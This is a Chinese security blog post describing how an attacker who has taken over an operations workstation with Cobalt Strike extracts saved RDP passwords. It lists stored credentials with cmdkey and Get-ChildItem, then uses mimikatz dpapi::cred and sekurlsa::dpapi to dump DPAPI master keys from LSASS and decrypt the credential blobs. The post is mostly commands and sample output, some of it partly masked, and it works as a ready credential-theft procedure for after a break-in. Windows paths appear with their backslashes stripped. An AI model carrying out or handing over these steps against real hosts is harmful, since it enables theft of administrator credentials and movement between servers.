获取远程主机保存的RDP凭据密码

Windows hackctf
2022-10-24 24,429

拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。


Windows保存RDP凭据的目录是C:Users用户名AppDataLocalMicrosoftCredentials


可通过命令行获取,执行: cmdkey /listpowerpick Get-ChildItem C:Usersrasta_mouseAppDataLocalMicrosoftCredentials -Force


注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。



使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData

mimikatz dpapi::cred /in:C:UsersUSERNAMEAppDataLocalMicrosoftCredentialsSESSIONID


输出应类似

**BLOB**dwVersion          : 00000001 - 1guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}dwMasterKeyVersion : 00000001 - 1guidMasterKey      : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}dwFlags            : 20000000 - 536870912 (system ; )dwDescriptionLen   : 00000012 - 18szDescription      : 本地凭据数据

algCrypt           : 00006610 - 26128 (CALG_AES_256)dwAlgCryptLen      : 00000100 - 256dwSaltLen          : 00000020 - 32pbSalt             : 726d845b8a4eba29875****10659ec2d5e210a48fdwHmacKeyLen       : 00000000 - 0pbHmackKey         : algHash            : 0000800e - 32782 (CALG_SHA_512)dwAlgHashLen       : 00000200 - 512dwHmac2KeyLen      : 00000020 - 32pbHmack2Key        : cda4760ed3fb1c7874****28973f5b5b403fe31f233dwDataLen          : 000000c0 - 192pbData             : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06ddwSignLen          : 00000040 - 64pbSign             : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655


需要关注的是guidMasterKey、pbData,pbData是我们要解密的数据,guidMasterKey是解密所需要的密钥。这里LSASS已经在其缓存中存有这个key因此我们可以使用SeDebugPrivilege获取。

beacon> mimikatz !sekurlsa::dpapi


mimikatz !sekurlsa::dpapi
      [00000001]     
      * GUID      :    {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}     
      * Time      :    2020/1/3 8:05:02     
      * MasterKey :    02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148     
      * sha1(key) :    3e6dc57a0fe****a902cfaf617b1322     [00000002]     
      * GUID      :    {edcb491a-91d7-4d98-a714-8bc60254179f}     
      * Time      :    2020/1/3 8:05:02     
      * MasterKey :    c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202     
      * sha1(key) :    5e1b3eb1152d3****6d3d6f90aaeb


然后将凭据保存到本地,执行

mimikatz "dpapi::cred /in:C:UsersUSERNAMEDesktoptestSESSION /masterkey:对应的GUID key"


本文作者:hackctf

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/189762.html

Tags:
点赞: 3 评论:0 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (0)
快来写下你的想法吧!

hackctf
文章数:40 积分: 80

微信公众号:hackctf

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼